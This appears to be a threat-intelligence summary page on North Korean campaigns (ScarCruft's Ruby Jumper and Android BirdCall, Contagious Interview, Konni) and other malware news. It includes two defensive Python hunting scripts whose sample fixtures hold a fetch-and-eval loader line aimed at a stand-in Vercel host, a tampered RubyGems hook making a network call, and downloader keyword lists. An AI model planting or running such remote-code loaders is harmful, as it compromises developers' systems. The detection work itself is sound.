

ScarCruft (APT37) Expands Tactics with Ruby Jumper Campaign Targeting Air-Gapped Networks

5 unique sources, 26 articles

Summary


The **ScarCruft (APT37) Ruby Jumper campaign** and its broader espionage operations continue to evolve, with the group now deploying an **Android variant of the BirdCall backdoor** via a **supply-chain attack on sqgame[.]net**, a Chinese gaming platform targeting Koreans in the **Yanbian region**—a transit hub for North Korean defectors. This marks ScarCruft’s first documented use of **mobile malware in a supply-chain context**, expanding its targeting beyond Windows systems to include **Android devices used by high-risk populations**. The Android BirdCall variant (internally named **'zhuagou'**) collects **geolocation data, contact lists, SMS/call logs, device metadata, and files of interest** (e.g., documents, audio recordings, certificates), while also **recording ambient audio during evening hours** (7 pm–10 pm local time) and using **anti-suspension techniques** (e.g., silent MP3 loops) to evade detection. The malware leverages **Zoho WorkDrive for C2**, with **12 separate accounts identified** in this campaign, aligning with the group’s broader abuse of legitimate cloud services. Earlier campaigns, such as **Ruby Jumper (December 2025–February 2026)**, demonstrated ScarCruft’s focus on **air-gapped network breaches** via **USB-based implants (THUMBSBD, VIRUSTASK)** and **cloud-abused C2 (Zoho WorkDrive)**, alongside **multi-stage infection chains** combining LNK files, PowerShell scripts, and Ruby runtime manipulation. The **supply-chain compromise of sqgame[.]net**—first observed in **late 2024**—involved **poisoned APKs** (`ybht.apk`, `sqybhs.apk`) and a **trojanized Windows DLL** (delivered via an update package) that deployed RokRAT as a precursor to BirdCall. This campaign underscores ScarCruft’s **adaptive tradecraft**, blending **supply-chain compromise with mobile surveillance** to exploit geopolitically sensitive targets. The **iOS game on the platform remained uncompromised**, likely due to Apple’s stringent review process.

Timeline

  1. 05.05.2026 12:04 3 articles · 1d ago

    ScarCruft Deploys Android BirdCall Spyware via Supply-Chain Attack on sqgame[.]net

    In **late 2024–May 2026**, ScarCruft (APT37) compromised **sqgame[.]net**, a Chinese gaming platform targeting Koreans in the **Yanbian region** (a transit hub for North Korean defectors), to distribute an **Android variant of the BirdCall backdoor** via **poisoned APKs** for **Yanbian Red Ten** and **New Drawing** (`sqgame.com[.]cn/ybht.apk`, `sqgame.com[.]cn/sqybhs.apk`). This marks the group’s first use of **mobile malware in a supply-chain context**, expanding its espionage toolkit beyond Windows systems. The Android BirdCall variant—**internally named 'zhuagou'** and under active development across **seven versions (October 2024–June 2025)**—collects **contact lists, SMS/call logs, media files, documents, screenshots, and ambient audio** (recorded between 7 pm–10 pm local time), while using **Zoho WorkDrive for C2 communication**, with **12 separate accounts identified** in this campaign. The compromise also involved a **trojanized Windows DLL** in the platform’s update package, which—after **anti-analysis checks** (e.g., scanning for virtual machine environments and analysis tools)—downloaded and executed **RokRAT**, subsequently deploying the Windows version of BirdCall. The **iOS game remained uncompromised**, likely due to Apple’s review process. ESET **notified sqgame of the compromise in December 2025**, but the **malicious APKs remained available** on the site as of May 2026. The **selective poisoning of Android APKs** underscores ScarCruft’s **targeted approach** to maximizing impact among high-risk populations, aligning with the group’s historical focus on **North Korean defectors, activists, and academics**.

  2. 27.02.2026 14:43 3 articles · 2mo ago

    ScarCruft Launches Ruby Jumper Campaign with Zoho WorkDrive C2 and USB-Based Air-Gap Breaches

    In **December 2025**, ScarCruft (APT37) launched the **Ruby Jumper campaign**, introducing **new tactics for breaching air-gapped networks** and abusing **Zoho WorkDrive for C2 communication**. The campaign employs a **multi-stage infection chain** starting with a malicious LNK file that drops a **decoy document** (an Arabic translation of a North Korean article on the Palestine-Israel conflict), an executable payload (**RESTLEAF**), a PowerShell script, and a batch file. The batch script triggers PowerShell, which decrypts and loads RESTLEAF in memory. RESTLEAF authenticates with Zoho WorkDrive using a valid access token to fetch shellcode, which is executed via process injection. This leads to the deployment of **SNAKEDROPPER**, which installs a **Ruby runtime environment** (Ruby 3.3.0) disguised as a USB utility (`usbspeed.exe`) and establishes persistence by replacing the RubyGems default file `operating_system.rb` with a malicious version. A scheduled task (`rubyupdatecheck`) ensures execution every five minutes. SNAKEDROPPER then drops two implants, **THUMBSBD** and **VIRUSTASK**, both Ruby-based and designed to **weaponize removable media (USB drives)**:

    - **THUMBSBD** creates hidden directories on USB drives to stage operator commands or store exfiltrated data, turning removable media into a **bidirectional covert C2 relay** for air-gapped systems. It supports **keylogging, audio/video capture, file manipulation, and registry modification**, and can distribute the **BLUELIGHT backdoor**.
    - **VIRUSTASK** acts as a lightweight backdoor that **stages exfiltrated data on USB drives** in hidden or obfuscated form for later retrieval, focusing on **propagating malware to air-gapped systems** via removable media. It replaces legitimate files with malicious shortcuts that execute the Ruby interpreter when opened, but only triggers if the media has **at least 2GB of free space**.

    SNAKEDROPPER also deploys **FOOTWINE**, a reconnaissance and collection utility disguised as an APK file that harvests documents and supports **keylogging, screenshot capture, audio/video recording, file manipulation, and remote shell commands**. The campaign includes **BLUELIGHT**, an encrypted payload with a shellcode launcher that enables **keylogging, audio/video surveillance, and custom TCP-based C2 communication**, adapting its mode based on network connectivity. The campaign was **discovered in December 2025** and **documented by Zscaler ThreatLabz in February 2026**, confirming the use of **six distinct tools**, five of which (**Restleaf, SnakeDropper, ThumbSBD, VirusTask, FootWine**) were previously undocumented. This represents ScarCruft’s first use of **Zoho WorkDrive for C2** and a **dedicated focus on air-gapped infiltration**, combining **cloud abuse with physical media exploitation** to evade network isolation and achieve persistent surveillance. The **decoy document** indicates targeting of individuals interested in North Korean media narratives, aligning with APT37’s historical victim profiles.
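As an added defender-side example (not Zscaler's code or anything from the campaign), the following script checks a host inventory for the persistence and USB-staging artifacts named above: the `rubyupdatecheck` task, the renamed interpreter `usbspeed.exe`, a tampered RubyGems `operating_system.rb`, document-impersonating shortcuts that launch Ruby, and hidden directories on removable media. The task command line, file paths, drive letters and the `operating_system.rb` content heuristic are constructed assumptions.

```python
import re
from dataclasses import dataclass

# Indicators quoted from the Ruby Jumper write-up above.
TASK_NAME = "rubyupdatecheck"          # scheduled task, runs every five minutes
DECOY_RUBY_EXE = "usbspeed.exe"        # Ruby 3.3.0 interpreter renamed as a USB utility
RUBYGEMS_HOOK = "rubygems/defaults/operating_system.rb"  # default file SNAKEDROPPER replaces
# Assumption: a stock operating_system.rb is a near-empty hook, so one that spawns
# processes or talks to the network is suspect (constructed heuristic).
SUSPICIOUS_RUBY = re.compile(r"net::http|system\(|spawn\(|io\.popen|workdrive", re.I)
DOC_EXT = (".doc", ".docx", ".pdf", ".xls", ".xlsx", ".ppt", ".pptx", ".hwp", ".txt")


@dataclass
class Task:
    name: str
    interval_minutes: int
    command: str


@dataclass
class Entry:
    path: str              # forward slashes; system drive is c:/, removable drives are others
    is_dir: bool = False
    hidden: bool = False
    lnk_target: str = ""   # resolved target command line for .lnk entries
    content: str = ""      # text of small files we want to inspect


def hunt(tasks: list[Task], entries: list[Entry]) -> list[str]:
    """Return one 'kind:location' string per matched indicator (empty list = clean)."""
    findings = []
    for t in tasks:
        if t.name.lower() == TASK_NAME or (t.interval_minutes == 5 and "ruby" in t.command.lower()):
            findings.append(f"task:{t.name}")
    for e in entries:
        p = e.path.lower()
        base = p.rsplit("/", 1)[-1]
        removable = not p.startswith("c:/")
        if base == DECOY_RUBY_EXE:
            findings.append(f"decoy-ruby:{e.path}")
        if p.endswith(RUBYGEMS_HOOK) and SUSPICIOUS_RUBY.search(e.content):
            findings.append(f"rubygems-hook:{e.path}")
        if base.endswith(".lnk") and any(x in e.lnk_target.lower() for x in ("ruby", DECOY_RUBY_EXE)):
            # VIRUSTASK swaps documents on the stick for shortcuts that launch the interpreter
            kind = "doc-impersonating-lnk" if base[:-4].endswith(DOC_EXT) else "ruby-lnk"
            findings.append(f"{kind}:{e.path}")
        if e.is_dir and e.hidden and removable and base != "system volume information":
            findings.append(f"hidden-dir-on-removable:{e.path}")  # THUMBSBD staging directory
    return findings


# Constructed sample inventory (not real telemetry).
SAMPLE_TASKS = [
    Task("GoogleUpdateTaskMachineUA", 60, r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"),
    Task("rubyupdatecheck", 5, r"C:\ProgramData\usb\usbspeed.exe C:\ProgramData\usb\main.rb"),
]
SAMPLE_ENTRIES = [
    Entry("c:/programdata/usb/usbspeed.exe"),
    Entry("c:/programdata/usb/lib/ruby/3.3.0/rubygems/defaults/operating_system.rb",
          content="require 'net/http'\nNet::HTTP.get(URI('https://workdrive.example/x'))\n"),
    Entry("e:/System Volume Information", is_dir=True, hidden=True),   # legitimate hidden dir
    Entry("e:/.thumbs", is_dir=True, hidden=True),
    Entry("e:/report.pdf.lnk", lnk_target=r"E:\.thumbs\usbspeed.exe E:\.thumbs\run.rb"),
    Entry("e:/photos/holiday.jpg"),
]

if __name__ == "__main__":
    for line in hunt(SAMPLE_TASKS, SAMPLE_ENTRIES):
        print(line)
```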

  3. 26.02.2026 12:35 1 article · 2mo ago

    GitLab Bans 131 Accounts Linked to Contagious Interview Campaign

    In February 2026, **GitLab banned 131 accounts** tied to the Contagious Interview campaign, citing their role in distributing **malicious code repositories** targeting developers. Analysis revealed that threat actors primarily used **consumer VPNs (80% of cases)** and **Gmail addresses (90%)** to create accounts, with intermittent use of **dedicated VPS infrastructure** and likely **laptop farms**. The actors leveraged **six legitimate services** to host malware payloads, including **Vercel (49 instances in 2025)**, **JSON Keeper**, **Mocki**, **npoint.io**, **Render**, and **Railway.app**, with Vercel remaining the most prevalent. A **private GitLab project** controlled by the group was also discovered, containing **financial and personnel records** for a North Korean IT worker cell. The records showed **earnings exceeding $1.64 million** between Q1 2022 and Q3 2025, with **detailed spreadsheets tracking quarterly income performance** for individual team members. The project highlighted the operation’s **structured enterprise model**, including **hierarchical oversight**, **defined revenue targets**, and **global facilitator networks** for money laundering and operational resiliency. GitLab’s findings corroborate broader trends in the campaign, including the use of **VS Code tasks**, **obfuscated payloads in fake font files**, and **multi-stage droppers** to evade detection. The platform’s takedown underscores the campaign’s **sustained infrastructure** and **adaptive hosting strategies**, as actors rotate between services to maintain persistence.

  4. 10.11.2025 22:29 4 articles · 5mo ago

    Konni Exploits Google's Find Hub for Remote Data Wiping

    North Korean threat actors, including Konni APT (APT37/Kimsuky), have weaponized Google’s Find Hub service to remotely reset Android devices in South Korea, marking the first confirmed instance of a nation-state APT abusing this feature for destructive operations. The campaign, discovered in November 2025, involves a two-stage attack: initial spear-phishing (since July 2024) targeting Android devices via spoofed entities (e.g., National Tax Service), followed by secondary malware distribution through compromised KakaoTalk PC sessions. Attackers compromised the account of a psychological counselor for North Korean defectors on September 5, 2025, using it to distribute a digitally signed MSI installer ('Stress Clear.msi') disguised as a stress-relief program. The installer deployed AutoIt loaders that established persistence via scheduled tasks and C2 communication, fetching RATs like RemcosRAT, QuasarRAT, and RftRAT. Using stolen Google credentials, attackers tracked victim locations via Find Hub and triggered remote wipes when targets were away, delaying discovery and severing communication channels. The attack chain also involved prolonged internal reconnaissance, exfiltration of PII and webcam captures, and exploitation of Find Hub’s location tracking to execute remote resets. This tactic combines device sabotage, credential theft, and social engineering to erase forensic evidence and amplify the campaign’s reach through trusted contacts. The MSI installer’s setup routine deleted traces to hinder analysis, while AutoIt scripts maintained continuous C2 communication.

  5. 25.09.2025 16:14 12 articles · 7mo ago

    North Korean Threat Actors Launch Contagious Interview Campaign

    The **Contagious Interview campaign**, attributed to North Korean actors including **Lazarus/BlueNoroff**, has expanded with **new tactics observed in February 2026**, where **malicious Next.js repositories** are used as lures to deliver **in-memory JavaScript malware** via **three distinct execution paths**:

    1. **VS Code workspace execution**: Projects with workspace automation configuration (`runOn: "folderOpen"` in `tasks.json`) auto-execute malicious code from Vercel or GitHub gists when the developer opens and trusts the project.
    2. **Build-time execution**: Modified JavaScript libraries (e.g., `jquery.min.js`) embedded in repositories activate during `npm run dev`, fetching and executing a JavaScript loader hosted on attacker-controlled infrastructure.
    3. **Server startup execution**: Backend modules or route files exfiltrate process environment variables to an external server and execute JavaScript responses in memory within the Node.js server process.

    The payloads **profile the host**, register with a C2 server for a unique `instanceId`, and deploy a **second-stage controller** that maintains persistence, supports operator-driven discovery/exfiltration, and minimizes disk traces. Microsoft Defender flagged the activity via suspicious outbound Node.js connections, linking it to a broader cluster of threats using **job-themed lures** to blend into developer workflows. This evolution follows the **January 2026 deployment of malicious VS Code projects** and the **December 2025 EtherRAT campaign**, which exploited **React2Shell (CVE-2025-55182)**. The group continues to refine its **multi-stage infection chains**, now leveraging **alternative staging infrastructure** (GitHub gists, URL shorteners, blockchain-based NFT contracts) and **collaborating with North Korea’s fraudulent IT workers (WageMole)**. The campaign remains focused on **cryptocurrency/Web3 developers**, **global tech sectors**, and **espionage-driven financial theft**.

    **Additional developments** include:

    - A **malicious npm package (`eslint-validator`)** fetching obfuscated BeaverTail payloads from Google Drive.
    - A **Windows-specific infection chain** using batch scripts to download Node.js and deploy PyArmor-protected Python malware via `certutil`.
    - **GitLab’s ban of 131 accounts** tied to the campaign, with threat actors primarily using consumer VPNs, Gmail addresses, and legitimate services (Vercel, JSON Keeper, Mocki) to host payloads.
    - Discovery of a **private GitLab project** tracking a North Korean IT worker cell’s earnings ($1.64M between Q1 2022–Q3 2025), revealing structured financial oversight and hierarchical operations.
    - **Okta’s observation** that actors are refining interview tactics, with some scheduling hundreds of interviews to improve success rates in bypassing screening.
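An added example, not code from any of the cited reports: a pre-open check for the VS Code `tasks.json` auto-run pattern in execution path 1, flagging `folderOpen` tasks whose command line references a remote URL, a known staging host, a downloader, or inline code evaluation. The keyword lists, the staging-host list (built only from service names on this page) and the sample project are constructed.

```python
import json
import re

# Assumption (constructed heuristics): a task that fires on folderOpen and also
# references a URL, a downloader, or inline code evaluation deserves review before
# the developer trusts the workspace.
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
FETCHERS = ("curl", "wget", "invoke-webrequest", "iwr ", "certutil", "bitsadmin")
EVALERS = ("node -e", "node --eval", "eval(", "powershell -e")
# Hosting services the reports above saw used for staging payloads.
STAGING_HINTS = ("vercel.app", "gist.github", "jsonkeeper", "mocki",
                 "npoint.io", "render.com", "railway.app")


def _strip_json_comments(text: str) -> str:
    """tasks.json is JSON-with-comments; drop // and /* */ comments before parsing."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    return re.sub(r"^\s*//.*$", "", text, flags=re.M)


def scan_tasks_json(text: str) -> list[dict]:
    """Return one finding per auto-run task that looks like a remote-code loader."""
    doc = json.loads(_strip_json_comments(text))
    findings = []
    for task in doc.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue  # only tasks that start without the developer invoking them
        cmdline = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
        low = cmdline.lower()
        reasons = []
        urls = URL_RE.findall(cmdline)
        if urls:
            reasons.append("remote-url")
        if any(h in low for h in STAGING_HINTS):
            reasons.append("known-staging-host")
        if any(f in low for f in FETCHERS):
            reasons.append("downloader")
        if any(e in low for e in EVALERS):
            reasons.append("inline-eval")
        if reasons:
            findings.append({"label": task.get("label", "?"), "command": cmdline,
                             "urls": urls, "reasons": reasons})
    return findings


# Constructed sample mimicking a lure repository's .vscode/tasks.json (not a real one).
SAMPLE_TASKS_JSON = r'''{
  // benign-looking install task plus a loader that runs on folder open
  "version": "2.0.0",
  "tasks": [
    { "label": "npm: install deps", "type": "shell", "command": "npm install",
      "runOptions": { "runOn": "folderOpen" } },
    { "label": "setup env", "type": "shell", "command": "node",
      "args": ["-e", "fetch('https://example-lure.vercel.app/init.js').then(r=>r.text()).then(eval)"],
      "runOptions": { "runOn": "folderOpen" } }
  ]
}'''

if __name__ == "__main__":
    for f in scan_tasks_json(SAMPLE_TASKS_JSON):
        print(f["label"], f["reasons"], f["urls"])
```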

  6. 10.09.2025 16:04 1 article · 7mo ago

    ZynorRAT RAT Targets Windows, Linux, and macOS Systems

    A new malware family, ZynorRAT, has been discovered, targeting Windows, Linux, and macOS systems. ZynorRAT is a Go-based remote access trojan that uses a Telegram bot for command and control. The malware supports a wide range of functions, including file exfiltration, system enumeration, screenshot capture, and arbitrary command execution. The Windows version of ZynorRAT is near-identical to its Linux counterpart, indicating ongoing development. ZynorRAT is believed to be the work of a lone actor possibly of Turkish origin.

  7. 10.09.2025 14:59 2 articles · 7mo ago

    ChillyHell macOS Backdoor Resurfaces with New Version

    ChillyHell is written in C++ and developed for Intel architectures. The malware is attributed to an uncategorized threat cluster dubbed UNC4487, active since at least October 2022. UNC4487 is a suspected espionage actor that has compromised Ukrainian government websites to deploy ChillyHell. The malware establishes persistence using LaunchAgent, LaunchDaemon, and modifying the user's shell profile. It uses timestomping to modify file timestamps to evade detection. ChillyHell supports commands to launch a reverse shell, download new versions, fetch additional payloads, enumerate user accounts, and conduct brute-force attacks. The malware was notarized by Apple, highlighting that not all malicious code comes unsigned.

  8. 01.09.2025 11:26 1 article · 8mo ago

    Scarcruft (APT37) Launches Operation HanKook Phantom Targeting South Korean Academics

    In September 2025, a new phishing campaign, Operation HanKook Phantom, was discovered. This campaign targets individuals associated with the National Intelligence Research Association, including academic figures, former government officials, and researchers. The campaign uses spear-phishing emails with a lure for a "National Intelligence Research Society Newsletter" containing a ZIP archive attachment with a Windows shortcut (LNK) masquerading as a PDF document. The LNK file drops RokRAT malware, which is capable of collecting system information, executing arbitrary commands, enumerating the file system, capturing screenshots, and downloading additional payloads. RokRAT exfiltrates data via Dropbox, Google Cloud, pCloud, and Yandex Cloud. The campaign also involves a PowerShell script that deploys a dropper, which then runs a next-stage payload to steal sensitive data while concealing network traffic as a Chrome file upload. The lure document used in this instance is a statement issued by Kim Yo Jong, the Deputy Director of the Publicity and Information Department of the Workers' Party of Korea, rejecting Seoul's efforts at reconciliation.

  9. 14.08.2025 03:00 2 articles · 8mo ago

    Scarcruft (APT37) Launches Ransomware Campaign Targeting South Korea

    In July 2025, the North Korean threat group Scarcruft (APT37) initiated a new campaign targeting South Korea with a combination of infostealers, backdoors, and ransomware. The campaign, dubbed ChinopuNK, includes multiple malware tools designed for espionage and financial gain. The attacks start with phishing emails containing decoy documents about postal code updates. Once opened, these documents download NubSpy, a backdoor that uses the PubNub cloud service for command-and-control (C2) communication. The group also deploys ChillyChino, a PowerShell backdoor rewritten in Rust, and VCD ransomware, which encrypts specific file paths tailored to individual targets. The campaign is notable for its use of ransomware by a nation-state actor, combining espionage with financial and psychological pressure tactics.



Similar Happenings

Konni APT leverages EndRAT and KakaoTalk for multi-stage phishing and lateral propagation

A North Korean advanced persistent threat (APT) group, tracked as Konni, conducted a multi-stage spear-phishing campaign to compromise targets and abuse compromised KakaoTalk desktop application sessions for malware propagation. Initial access was achieved via a spear-phishing email masquerading as an appointment notice for a North Korean human rights lecturer, leading to execution of a malicious LNK file. The payload deployed a remote access trojan (RAT) named EndRAT (written in AutoIt), establishing persistence via scheduled tasks and exfiltrating sensitive data. The adversary maintained long-term access on compromised hosts, stole internal documents, and used the victim’s KakaoTalk contacts to selectively propagate malware via ZIP archives disguised as North Korea-related content. The campaign reflects a high-trust abuse strategy, leveraging compromised user accounts to deceive additional targets.

Lazarus Group Linked to Medusa Ransomware Attacks on U.S. Healthcare

North Korean state-backed hackers from the Lazarus group are targeting U.S. healthcare organizations and entities in the Middle East with Medusa ransomware in financially motivated extortion attacks. The Medusa ransomware-as-a-service (RaaS) operation has impacted over 366 organizations since its launch in 2023, with at least four additional healthcare and non-profit organizations in the U.S. targeted since November 2025. This is the first time Lazarus has been linked to Medusa ransomware, though they have been associated with other ransomware strains. The attacks use a toolset that includes both custom and commodity tools, some of which are linked to another North Korean group, Diamond Sleet. The average ransom recorded in these attacks is $260,000, which is reportedly used to fund espionage operations against defense, technology, and government sectors in the U.S., Taiwan, and South Korea. Symantec has provided indicators of compromise (IoCs) to help defenders prevent these attacks. The Stonefly sub-group of Lazarus, also known as Andariel, has been involved in ransomware operations for the past five years. Rim Jong Hyok, an alleged Stonefly member, was indicted by the US Justice Department for ransomware campaigns targeting US hospitals and healthcare providers. The US Justice Department announced a $10m reward for information related to Rim Jong Hyok.

Shift Left Security Strategy Fails to Deliver Expected Benefits

The 'shift left' security strategy, which aims to integrate security earlier in the software development lifecycle (SDLC), has failed to deliver its promised benefits. Developers are overwhelmed with cognitive load, and businesses prioritize speed over security, leading to increased risks. A study by Qualys found that 7.3% of container images from public repositories were malicious, with 70% containing cryptomining software. The strategy has shifted the burden onto developers without adequate support, resulting in security being bypassed or ignored. To address these issues, experts recommend a 'shift down' approach, where security is embedded into the infrastructure layer, managed by specialized teams. This approach automates security checks and fixes, reducing the cognitive load on developers and making secure deployment the path of least resistance.

Infostealer Malware Targets OpenClaw Configuration Files

Infostealer malware has been observed stealing OpenClaw configuration files containing API keys, authentication tokens, and other sensitive secrets. This marks the first known instance of such attacks targeting the popular AI assistant framework. The stolen data includes configuration details, authentication tokens, and persistent memory files, which could enable full compromise of the victim's digital identity. The malware, identified as a variant of the Vidar infostealer, executed a broad file-stealing routine that scanned for sensitive keywords. Researchers predict increased targeting of OpenClaw as it becomes more integrated into professional workflows. Additionally, security issues with OpenClaw have prompted the maintainers to partner with VirusTotal to scan for malicious skills uploaded to ClawHub, establish a threat model, and add the ability to audit for potential misconfigurations.

ZeroDayRAT Malware Targets Android and iOS Devices

A new commercial spyware platform, ZeroDayRAT, is being advertised on Telegram, offering full remote control over compromised Android (versions 5–16) and iOS (up to version 26) devices. The malware provides extensive surveillance capabilities, including real-time tracking, data theft, and financial fraud: it can log app usage, SMS messages, and notifications, activate cameras and microphones, and steal cryptocurrency and banking credentials. Infections are initiated by persuading victims to install malicious binaries via smishing, phishing emails, counterfeit app stores, and links shared through WhatsApp or Telegram. The malware includes a dedicated web-based dashboard that gives a complete overview of the phone's makeup (device model, SIM, location data, carrier info, live activity timeline, and recent SMS messages), and its feature set covers SMS control, a keylogger, a microphone feed, a screen recorder, a bank stealer, and a crypto stealer that targets online banking apps, UPI platforms, and payment services like Apple Pay and PayPal. ZeroDayRAT is sold openly on Telegram with access to a panel featuring sales, customer support, and platform updates channels, and is priced at $2,000, indicating higher-than-average ambitions and the targeting of specific individuals or enterprises. The malware represents a convergence of nation-state-level capabilities with criminal economics, widening the target market for surveillance malware.